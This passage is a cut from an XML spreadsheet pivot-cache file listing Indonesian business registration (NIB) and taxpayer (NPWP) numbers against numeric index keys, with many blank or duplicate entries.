    <x v="4816"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4817"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4818"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4819"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4820"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4821"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4822"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4823"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4824"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4825"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4826"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4827"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4828"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4829"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4830"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4831"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4832"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4833"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4834"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4835"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4836"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4837"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4838"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4839"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4840"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4841"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4842"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4843"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4844"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4845"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="4846"/>
    <s v="nib"/>
    <n v="220905970814"/>
  </r>
  <r>
    <x v="4847"/>
    <s v="nib"/>
    <n v="220200200978"/>
  </r>
  <r>
    <x v="4848"/>
    <s v="nib"/>
    <n v="220103762731"/>
  </r>
  <r>
    <x v="4753"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4849"/>
    <s v="nib"/>
    <n v="9120119051276"/>
  </r>
  <r>
    <x v="4600"/>
    <s v="npwp"/>
    <s v="71.436.642.4-045.000"/>
  </r>
  <r>
    <x v="4850"/>
    <s v="nib"/>
    <n v="9120213251036"/>
  </r>
  <r>
    <x v="4851"/>
    <s v="nib"/>
    <n v="9120200232468"/>
  </r>
  <r>
    <x v="4852"/>
    <s v="nib"/>
    <n v="213010211375"/>
  </r>
  <r>
    <x v="4853"/>
    <s v="nib"/>
    <n v="220000790715"/>
  </r>
  <r>
    <x v="4854"/>
    <s v="nib"/>
    <n v="220000790715"/>
  </r>
  <r>
    <x v="4855"/>
    <s v="nib"/>
    <n v="220004332606"/>
  </r>
  <r>
    <x v="4856"/>
    <s v="nib"/>
    <n v="220208980833"/>
  </r>
  <r>
    <x v="4857"/>
    <s v="nib"/>
    <n v="9120208900697"/>
  </r>
  <r>
    <x v="4722"/>
    <s v="npwp"/>
    <s v="02.881.392.1-036.000"/>
  </r>
  <r>
    <x v="4858"/>
    <s v="nib"/>
    <n v="1258000220096"/>
  </r>
  <r>
    <x v="4859"/>
    <s v="nib"/>
    <n v="9120206490326"/>
  </r>
  <r>
    <x v="4860"/>
    <s v="nib"/>
    <n v="9120102262959"/>
  </r>
  <r>
    <x v="1038"/>
    <s v="nib"/>
    <n v="8120109753513"/>
  </r>
  <r>
    <x v="4861"/>
    <s v="nib"/>
    <n v="220100772244"/>
  </r>
  <r>
    <x v="4862"/>
    <s v="nib"/>
    <n v="8120006810692"/>
  </r>
  <r>
    <x v="4854"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4850"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4863"/>
    <s v="nib"/>
    <n v="8120019120282"/>
  </r>
  <r>
    <x v="4864"/>
    <s v="nib"/>
    <n v="9120202252689"/>
  </r>
  <r>
    <x v="4755"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4865"/>
    <s v="nib"/>
    <n v="8120002711899"/>
  </r>
  <r>
    <x v="4862"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4857"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4866"/>
    <s v="nib"/>
    <n v="1256000132805"/>
  </r>
  <r>
    <x v="4867"/>
    <s v="nib"/>
    <n v="9120005510742"/>
  </r>
  <r>
    <x v="4858"/>
    <s v="npwp"/>
    <s v="80.180.202.6-801.000"/>
  </r>
  <r>
    <x v="1118"/>
    <s v="nib"/>
    <n v="9120603761679"/>
  </r>
  <r>
    <x v="4754"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4867"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4868"/>
    <s v="nib"/>
    <n v="220008222678"/>
  </r>
  <r>
    <x v="4869"/>
    <s v="nib"/>
    <n v="267010062686"/>
  </r>
  <r>
    <x v="4870"/>
    <s v="nib"/>
    <n v="220006711916"/>
  </r>
  <r>
    <x v="4871"/>
    <s v="nib"/>
    <n v="220006711916"/>
  </r>
  <r>
    <x v="4639"/>
    <s v="npwp"/>
    <n v="29880465402000"/>
  </r>
  <r>
    <x v="4872"/>
    <s v="nib"/>
    <n v="9120005531082"/>
  </r>
  <r>
    <x v="4863"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="90"/>
    <s v="nib"/>
    <n v="8120015222426"/>
  </r>
  <r>
    <x v="4873"/>
    <s v="nib"/>
    <n v="9120202252689"/>
  </r>
  <r>
    <x v="4874"/>
    <s v="nib"/>
    <n v="9120206132554"/>
  </r>
  <r>
    <x v="4875"/>
    <s v="nib"/>
    <n v="1251000122764"/>
  </r>
  <r>
    <x v="4646"/>
    <s v="npwp"/>
    <s v="15.718.437.5-922.000"/>
  </r>
  <r>
    <x v="4849"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4876"/>
    <s v="nib"/>
    <n v="1256000132805"/>
  </r>
  <r>
    <x v="4633"/>
    <s v="npwp"/>
    <s v="77.408.622.7-405.000"/>
  </r>
  <r>
    <x v="4874"/>
    <s v="npwp"/>
    <s v="31.486.986.8-619.000"/>
  </r>
  <r>
    <x v="4877"/>
    <s v="nib"/>
    <n v="8120113012069"/>
  </r>
  <r>
    <x v="4878"/>
    <s v="nib"/>
    <n v="9120005531082"/>
  </r>
  <r>
    <x v="4879"/>
    <s v="nib"/>
    <n v="1280000120584"/>
  </r>
  <r>
    <x v="4622"/>
    <s v="npwp"/>
    <n v="25346792017000"/>
  </r>
  <r>
    <x v="4880"/>
    <s v="nib"/>
    <n v="220205822641"/>
  </r>
  <r>
    <x v="4881"/>
    <s v="nib"/>
    <n v="8120109900876"/>
  </r>
  <r>
    <x v="4882"/>
    <s v="nib"/>
    <n v="228010200596"/>
  </r>
  <r>
    <x v="4883"/>
    <s v="nib"/>
    <n v="228010200596"/>
  </r>
  <r>
    <x v="4884"/>
    <s v="nib"/>
    <n v="8120015271228"/>
  </r>
  <r>
    <x v="4885"/>
    <s v="nib"/>
    <n v="912000091213"/>
  </r>
  <r>
    <x v="4745"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4886"/>
    <s v="nib"/>
    <n v="220106940934"/>
  </r>
  <r>
    <x v="4887"/>
    <s v="nib"/>
    <n v="242010091646"/>
  </r>
  <r>
    <x v="4888"/>
    <s v="nib"/>
    <n v="8120010030844"/>
  </r>
  <r>
    <x v="1229"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4884"/>
    <s v="npwp"/>
    <s v="08.210.707.9-215.000"/>
  </r>
  <r>
    <x v="4888"/>
    <s v="npwp"/>
    <n v="728922600642001"/>
  </r>
  <r>
    <x v="4889"/>
    <s v="nib"/>
    <n v="220107641955"/>
  </r>
  <r>
    <x v="4643"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4890"/>
    <s v="nib"/>
    <n v="9120109911767"/>
  </r>
  <r>
    <x v="4887"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4891"/>
    <s v="nib"/>
    <n v="9120014050379"/>
  </r>
  <r>
    <x v="4892"/>
    <s v="nib"/>
    <n v="220300321424"/>
  </r>
  <r>
    <x v="536"/>
    <s v="nib"/>
    <n v="9120000191213"/>
  </r>
  <r>
    <x v="4855"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4893"/>
    <s v="nib"/>
    <n v="8120000702827"/>
  </r>
  <r>
    <x v="4891"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="739"/>
    <s v="nib"/>
    <n v="220008850871"/>
  </r>
  <r>
    <x v="4879"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4892"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4894"/>
    <s v="nib"/>
    <n v="1227000112485"/>
  </r>
  <r>
    <x v="4895"/>
    <s v="nib"/>
    <n v="8120000702928"/>
  </r>
  <r>
    <x v="4896"/>
    <s v="nib"/>
    <n v="1238000122567"/>
  </r>
  <r>
    <x v="4897"/>
    <s v="nib"/>
    <n v="8120000702928"/>
  </r>
  <r>
    <x v="4878"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4871"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4898"/>
    <s v="nib"/>
    <n v="8120004860535"/>
  </r>
  <r>
    <x v="4685"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4899"/>
    <s v="nib"/>
    <n v="8120119022521"/>
  </r>
  <r>
    <x v="4900"/>
    <s v="nib"/>
    <n v="8120006930063"/>
  </r>
  <r>
    <x v="1619"/>
    <s v="nib"/>
    <n v="9120006841978"/>
  </r>
  <r>
    <x v="4898"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4901"/>
    <s v="nib"/>
    <n v="9120200"/>
  </r>
  <r>
    <x v="4902"/>
    <s v="nib"/>
    <n v="8120000870519"/>
  </r>
  <r>
    <x v="4903"/>
    <s v="nib"/>
    <n v="9120005270692"/>
  </r>
  <r>
    <x v="4875"/>
    <s v="npwp"/>
    <n v="834227522047000"/>
  </r>
  <r>
    <x v="4902"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4904"/>
    <s v="nib"/>
    <n v="8120018201213"/>
  </r>
  <r>
    <x v="4905"/>
    <s v="nib"/>
    <n v="1262000330539"/>
  </r>
  <r>
    <x v="4906"/>
    <s v="nib"/>
    <n v="8120204863103"/>
  </r>
  <r>
    <x v="4907"/>
    <s v="nib"/>
    <n v="9120300270214"/>
  </r>
  <r>
    <x v="4908"/>
    <s v="nib"/>
    <n v="8120004980314"/>
  </r>
  <r>
    <x v="4909"/>
    <s v="nib"/>
    <n v="9120217122151"/>
  </r>
  <r>
    <x v="4910"/>
    <s v="nib"/>
    <n v="273010230417"/>
  </r>
  <r>
    <x v="4911"/>
    <s v="nib"/>
    <n v="9120215283609"/>
  </r>
  <r>
    <x v="4907"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4906"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4908"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4912"/>
    <s v="nib"/>
    <n v="9120105883106"/>
  </r>
  <r>
    <x v="4707"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4910"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4865"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4913"/>
    <s v="nib"/>
    <n v="9120008430794"/>
  </r>
  <r>
    <x v="4912"/>
    <s v="npwp"/>
    <s v="02.386.136.2-821.000"/>
  </r>
  <r>
    <x v="4914"/>
    <s v="nib"/>
    <n v="9120113251619"/>
  </r>
  <r>
    <x v="4915"/>
    <s v="nib"/>
    <n v="9120007190831"/>
  </r>
  <r>
    <x v="4914"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4916"/>
    <s v="nib"/>
    <n v="220200691177"/>
  </r>
  <r>
    <x v="4917"/>
    <s v="nib"/>
    <s v="503/071/IUMK/KEC.P/III/2016"/>
  </r>
  <r>
    <x v="4918"/>
    <s v="nib"/>
    <s v="503/071/IUMK/KEC.P/III/2016"/>
  </r>
  <r>
    <x v="4913"/>
    <s v="npwp"/>
    <n v="908655111085000"/>
  </r>
  <r>
    <x v="4919"/>
    <s v="nib"/>
    <n v="9120508753203"/>
  </r>
  <r>
    <x v="4920"/>
    <s v="nib"/>
    <n v="220204221844"/>
  </r>
  <r>
    <x v="1014"/>
    <s v="nib"/>
    <n v="8120211221546"/>
  </r>
  <r>
    <x v="4365"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4911"/>
    <s v="npwp"/>
    <s v="02.937.969.5-721.000"/>
  </r>
  <r>
    <x v="4903"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4915"/>
    <s v="npwp"/>
    <s v="03.218.292.5-801.000"/>
  </r>
  <r>
    <x v="4921"/>
    <s v="nib"/>
    <n v="1262000210764"/>
  </r>
  <r>
    <x v="4922"/>
    <s v="nib"/>
    <n v="1242000301028"/>
  </r>
  <r>
    <x v="4919"/>
    <s v="npwp"/>
    <s v="01.941.600.7.614.000"/>
  </r>
  <r>
    <x v="4923"/>
    <s v="nib"/>
    <n v="1216000311526"/>
  </r>
  <r>
    <x v="4924"/>
    <s v="nib"/>
    <n v="211010102223"/>
  </r>
  <r>
    <x v="4925"/>
    <s v="nib"/>
    <n v="8120102991644"/>
  </r>
  <r>
    <x v="4926"/>
    <s v="nib"/>
    <n v="812011023884"/>
  </r>
  <r>
    <x v="4926"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4927"/>
    <s v="nib"/>
    <n v="8120008920266"/>
  </r>
  <r>
    <x v="4894"/>
    <s v="npwp"/>
    <s v="NPWP"/>
  </r>
  <r>
    <x v="4928"/>
    <s v="nib"/>
    <n v="8120108840033"/>
  </r>
  <r>
    <x v="4929"/>
    <s v="nib"/>
    <n v="9120209792632"/>
  </r>
  <r>
    <x v="4880"/>
    <s v="npwp"/>
    <s v="80.481.519.9-204.000"/>
  </r>
  <r>
    <x v="4930"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="4928"/>
    <s v="npwp"/>
    <s v="21.020.861.7-008.001"/>
  </r>
  <r>
    <x v="4927"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4931"/>
    <s v="nib"/>
    <n v="9120110081044"/>
  </r>
  <r>
    <x v="4932"/>
    <s v="nib"/>
    <n v="7371110506740000"/>
  </r>
  <r>
    <x v="4933"/>
    <s v="nib"/>
    <n v="8120109911788"/>
  </r>
  <r>
    <x v="4934"/>
    <s v="nib"/>
    <n v="1262000330539"/>
  </r>
  <r>
    <x v="4935"/>
    <s v="nib"/>
    <n v="220209771944"/>
  </r>
  <r>
    <x v="4936"/>
    <s v="nib"/>
    <n v="9120217281486"/>
  </r>
  <r>
    <x v="4937"/>
    <s v="nib"/>
    <n v="1275000111083"/>
  </r>
  <r>
    <x v="4923"/>
    <s v="npwp"/>
    <s v="41.764.406.9-224.000"/>
  </r>
  <r>
    <x v="4931"/>
    <s v="npwp"/>
    <n v="315444729418000"/>
  </r>
  <r>
    <x v="4938"/>
    <s v="nib"/>
    <n v="220207742126"/>
  </r>
  <r>
    <x v="4897"/>
    <s v="npwp"/>
    <n v="31605603047000"/>
  </r>
  <r>
    <x v="4933"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4939"/>
    <s v="nib"/>
    <n v="1248000321277"/>
  </r>
  <r>
    <x v="4940"/>
    <s v="nib"/>
    <n v="1267000321673"/>
  </r>
  <r>
    <x v="4941"/>
    <s v="nib"/>
    <n v="1233000321978"/>
  </r>
  <r>
    <x v="4942"/>
    <s v="nib"/>
    <n v="1223000331177"/>
  </r>
  <r>
    <x v="4943"/>
    <s v="nib"/>
    <n v="1255000331276"/>
  </r>
  <r>
    <x v="4944"/>
    <s v="nib"/>
    <n v="1255000331276"/>
  </r>
  <r>
    <x v="4945"/>
    <s v="nib"/>
    <n v="1277000350294"/>
  </r>
  <r>
    <x v="4946"/>
    <s v="nib"/>
    <n v="8120207860013"/>
  </r>
  <r>
    <x v="4947"/>
    <s v="nib"/>
    <n v="1284000331177"/>
  </r>
  <r>
    <x v="4948"/>
    <s v="nib"/>
    <n v="1288000321871"/>
  </r>
  <r>
    <x v="4949"/>
    <s v="nib"/>
    <n v="1278000321664"/>
  </r>
  <r>
    <x v="4893"/>
    <s v="npwp"/>
    <n v="743812240418000"/>
  </r>
  <r>
    <x v="4950"/>
    <s v="nib"/>
    <n v="243000910376"/>
  </r>
  <r>
    <x v="4932"/>
    <s v="npwp"/>
    <s v="15.631.355.3-801.000"/>
  </r>
  <r>
    <x v="4951"/>
    <s v="nib"/>
    <n v="220204251476"/>
  </r>
  <r>
    <x v="4952"/>
    <s v="nib"/>
    <n v="220000211337"/>
  </r>
  <r>
    <x v="4953"/>
    <s v="nib"/>
    <n v="220203271148"/>
  </r>
  <r>
    <x v="4954"/>
    <s v="nib"/>
    <n v="8120004852898"/>
  </r>
  <r>
    <x v="4955"/>
    <s v="nib"/>
    <n v="231000910979"/>
  </r>
  <r>
    <x v="4956"/>
    <s v="nib"/>
    <n v="9120116101291"/>
  </r>
  <r>
    <x v="4918"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1396"/>
    <s v="nib"/>
    <n v="9120215283609"/>
  </r>
  <r>
    <x v="4957"/>
    <s v="nib"/>
    <n v="9120009540042"/>
  </r>
  <r>
    <x v="4946"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4958"/>
    <s v="nib"/>
    <n v="1201000120292"/>
  </r>
  <r>
    <x v="4876"/>
    <s v="npwp"/>
    <n v="315589168723000"/>
  </r>
  <r>
    <x v="4958"/>
    <s v="npwp"/>
    <s v="02.046.906.0-903.000"/>
  </r>
  <r>
    <x v="4959"/>
    <s v="nib"/>
    <n v="9120202130592"/>
  </r>
  <r>
    <x v="4960"/>
    <s v="nib"/>
    <n v="1251000321899"/>
  </r>
  <r>
    <x v="4960"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4957"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4961"/>
    <s v="nib"/>
    <n v="220003561104"/>
  </r>
  <r>
    <x v="4950"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4869"/>
    <s v="npwp"/>
    <s v="41.770.352.7-325.000"/>
  </r>
  <r>
    <x v="4962"/>
    <s v="nib"/>
    <n v="220002302252"/>
  </r>
  <r>
    <x v="4963"/>
    <s v="nib"/>
    <n v="8120015222426"/>
  </r>
  <r>
    <x v="4964"/>
    <s v="nib"/>
    <n v="9120105402348"/>
  </r>
  <r>
    <x v="4965"/>
    <s v="nib"/>
    <n v="9120306482455"/>
  </r>
  <r>
    <x v="4966"/>
    <s v="nib"/>
    <n v="8120003851916"/>
  </r>
  <r>
    <x v="4967"/>
    <s v="nib"/>
    <n v="8120109832577"/>
  </r>
  <r>
    <x v="4968"/>
    <s v="nib"/>
    <n v="8120109832577"/>
  </r>
  <r>
    <x v="4969"/>
    <s v="nib"/>
    <n v="8120003851916"/>
  </r>
  <r>
    <x v="4956"/>
    <s v="npwp"/>
    <n v="757936257647000"/>
  </r>
  <r>
    <x v="4966"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4970"/>
    <s v="nib"/>
    <n v="9120304230146"/>
  </r>
  <r>
    <x v="4971"/>
    <s v="nib"/>
    <n v="9120003932401"/>
  </r>
  <r>
    <x v="4963"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4972"/>
    <s v="nib"/>
    <n v="1218000391608"/>
  </r>
  <r>
    <x v="4945"/>
    <s v="npwp"/>
    <s v="71.379.931.0-727.000"/>
  </r>
  <r>
    <x v="4973"/>
    <s v="nib"/>
    <n v="220104540353"/>
  </r>
  <r>
    <x v="4974"/>
    <s v="nib"/>
    <n v="234010132213"/>
  </r>
  <r>
    <x v="4856"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4964"/>
    <s v="npwp"/>
    <s v="84.491.694.0-941.000"/>
  </r>
  <r>
    <x v="4975"/>
    <s v="nib"/>
    <n v="1274000311328"/>
  </r>
  <r>
    <x v="4976"/>
    <s v="nib"/>
    <n v="9120100202183"/>
  </r>
  <r>
    <x v="4977"/>
    <s v="nib"/>
    <n v="9120100202183"/>
  </r>
  <r>
    <x v="4978"/>
    <s v="nib"/>
    <n v="220203652954"/>
  </r>
  <r>
    <x v="4954"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4979"/>
    <s v="nib"/>
    <n v="1233000350396"/>
  </r>
  <r>
    <x v="4977"/>
    <s v="npwp"/>
    <n v="715851770805000"/>
  </r>
  <r>
    <x v="4980"/>
    <s v="nib"/>
    <n v="1233000350396"/>
  </r>
  <r>
    <x v="4981"/>
    <s v="nib"/>
    <n v="1207000332057"/>
  </r>
  <r>
    <x v="4982"/>
    <s v="nib"/>
    <n v="9120200880977"/>
  </r>
  <r>
    <x v="4983"/>
    <s v="nib"/>
    <n v="9120301142336"/>
  </r>
  <r>
    <x v="4984"/>
    <s v="nib"/>
    <n v="9120303391021"/>
  </r>
  <r>
    <x v="4985"/>
    <s v="nib"/>
    <n v="214010021623"/>
  </r>
  <r>
    <x v="4986"/>
    <s v="nib"/>
    <n v="220101153403"/>
  </r>
  <r>
    <x v="4987"/>
    <s v="nib"/>
    <n v="1220000332366"/>
  </r>
  <r>
    <x v="4541"/>
    <s v="npwp"/>
    <s v="02.164.573.4-809.000"/>
  </r>
  <r>
    <x v="4988"/>
    <s v="nib"/>
    <n v="1212000302678"/>
  </r>
  <r>
    <x v="4989"/>
    <s v="nib"/>
    <n v="9120508753203"/>
  </r>
  <r>
    <x v="4900"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4990"/>
    <s v="nib"/>
    <n v="9120001432278"/>
  </r>
  <r>
    <x v="4991"/>
    <s v="nib"/>
    <n v="9120003331469"/>
  </r>
  <r>
    <x v="4992"/>
    <s v="nib"/>
    <n v="9120506822115"/>
  </r>
  <r>
    <x v="4993"/>
    <s v="nib"/>
    <n v="9120001432278"/>
  </r>
  <r>
    <x v="4992"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4994"/>
    <s v="nib"/>
    <n v="220003690831"/>
  </r>
  <r>
    <x v="4896"/>
    <s v="npwp"/>
    <s v="41.254.698.8-801.000"/>
  </r>
  <r>
    <x v="4989"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4993"/>
    <s v="npwp"/>
    <s v="02.383.778.4-801.000"/>
  </r>
  <r>
    <x v="4995"/>
    <s v="nib"/>
    <n v="8120015222426"/>
  </r>
  <r>
    <x v="4737"/>
    <s v="npwp"/>
    <s v="90.606.421.7-126.000"/>
  </r>
  <r>
    <x v="4996"/>
    <s v="nib"/>
    <n v="1294000313303"/>
  </r>
  <r>
    <x v="4996"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4952"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4997"/>
    <s v="nib"/>
    <n v="9120213050944"/>
  </r>
  <r>
    <x v="4998"/>
    <s v="nib"/>
    <n v="8120100840881"/>
  </r>
  <r>
    <x v="4999"/>
    <s v="nib"/>
    <n v="8120100840881"/>
  </r>
  <r>
    <x v="5000"/>
    <s v="nib"/>
    <n v="220003841941"/>
  </r>
  <r>
    <x v="5001"/>
    <s v="nib"/>
    <n v="220001671508"/>
  </r>
  <r>
    <x v="5002"/>
    <s v="nib"/>
    <n v="1293000302175"/>
  </r>
  <r>
    <x v="5003"/>
    <s v="nib"/>
    <n v="1256000131793"/>
  </r>
  <r>
    <x v="5004"/>
    <s v="nib"/>
    <n v="1227000343107"/>
  </r>
  <r>
    <x v="4984"/>
    <s v="npwp"/>
    <s v="16.009.202.9-804.000"/>
  </r>
  <r>
    <x v="5005"/>
    <s v="nib"/>
    <n v="8120008811366"/>
  </r>
  <r>
    <x v="5006"/>
    <s v="nib"/>
    <n v="1268000373018"/>
  </r>
  <r>
    <x v="5007"/>
    <s v="nib"/>
    <n v="9120011122859"/>
  </r>
  <r>
    <x v="5008"/>
    <s v="nib"/>
    <n v="9120001512389"/>
  </r>
  <r>
    <x v="4999"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5009"/>
    <s v="nib"/>
    <n v="220009312343"/>
  </r>
  <r>
    <x v="4991"/>
    <s v="npwp"/>
    <s v="84.333.332.9-215.000"/>
  </r>
  <r>
    <x v="4994"/>
    <s v="npwp"/>
    <s v="-"/>
  </r>
  <r>
    <x v="5010"/>
    <s v="nib"/>
    <n v="8120010182077"/>
  </r>
  <r>
    <x v="5011"/>
    <s v="nib"/>
    <n v="8120010182077"/>
  </r>
  <r>
    <x v="5012"/>
    <s v="nib"/>
    <n v="220207710661"/>
  </r>
  <r>
    <x v="5013"/>
    <s v="nib"/>
    <n v="220207710661"/>
  </r>
  <r>
    <x v="4518"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4924"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5014"/>
    <s v="nib"/>
    <n v="220008672693"/>
  </r>
  <r>
    <x v="5015"/>
    <s v="nib"/>
    <n v="9120104761754"/>
  </r>
  <r>
    <x v="5016"/>
    <s v="nib"/>
    <n v="9120202252689"/>
  </r>
  <r>
    <x v="5017"/>
    <s v="nib"/>
    <n v="9120402321631"/>
  </r>
  <r>
    <x v="5018"/>
    <s v="nib"/>
    <s v="Nomor : 0220102202974"/>
  </r>
  <r>
    <x v="144"/>
    <s v="nib"/>
    <n v="1297002482769"/>
  </r>
  <r>
    <x v="5019"/>
    <s v="nib"/>
    <n v="9120100202183"/>
  </r>
  <r>
    <x v="5020"/>
    <s v="nib"/>
    <n v="8120210170155"/>
  </r>
  <r>
    <x v="5020"/>
    <s v="npwp"/>
    <n v="864266366723000"/>
  </r>
  <r>
    <x v="5021"/>
    <s v="nib"/>
    <n v="812001523971"/>
  </r>
  <r>
    <x v="5022"/>
    <s v="nib"/>
    <n v="8120316140273"/>
  </r>
  <r>
    <x v="5021"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5022"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5023"/>
    <s v="nib"/>
    <n v="9120001162649"/>
  </r>
  <r>
    <x v="5023"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5024"/>
    <s v="nib"/>
    <n v="9120402111852"/>
  </r>
  <r>
    <x v="5025"/>
    <s v="nib"/>
    <n v="9120000982664"/>
  </r>
  <r>
    <x v="5026"/>
    <s v="nib"/>
    <n v="1270001450276"/>
  </r>
  <r>
    <x v="5026"/>
    <s v="npwp"/>
    <s v="NPWP Kasih Jaya"/>
  </r>
  <r>
    <x v="5027"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="5028"/>
    <s v="nib"/>
    <n v="220106311224"/>
  </r>
  <r>
    <x v="5029"/>
    <s v="nib"/>
    <n v="279010171826"/>
  </r>
  <r>
    <x v="5030"/>
    <s v="nib"/>
    <n v="221010142445"/>
  </r>
  <r>
    <x v="5031"/>
    <s v="nib"/>
    <n v="8120001892642"/>
  </r>
  <r>
    <x v="5032"/>
    <s v="nib"/>
    <n v="1288000420261"/>
  </r>
  <r>
    <x v="5033"/>
    <s v="nib"/>
    <n v="9120113060595"/>
  </r>
  <r>
    <x v="5033"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5005"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5034"/>
    <s v="nib"/>
    <n v="220001511038"/>
  </r>
  <r>
    <x v="5017"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5027"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5013"/>
    <s v="npwp"/>
    <s v="94.977.532.4-325.001"/>
  </r>
  <r>
    <x v="5035"/>
    <s v="nib"/>
    <n v="217010010016"/>
  </r>
  <r>
    <x v="4868"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5036"/>
    <s v="nib"/>
    <n v="9120312201367"/>
  </r>
  <r>
    <x v="5019"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5037"/>
    <s v="nib"/>
    <n v="1282000230588"/>
  </r>
  <r>
    <x v="5038"/>
    <s v="nib"/>
    <n v="1213000222232"/>
  </r>
  <r>
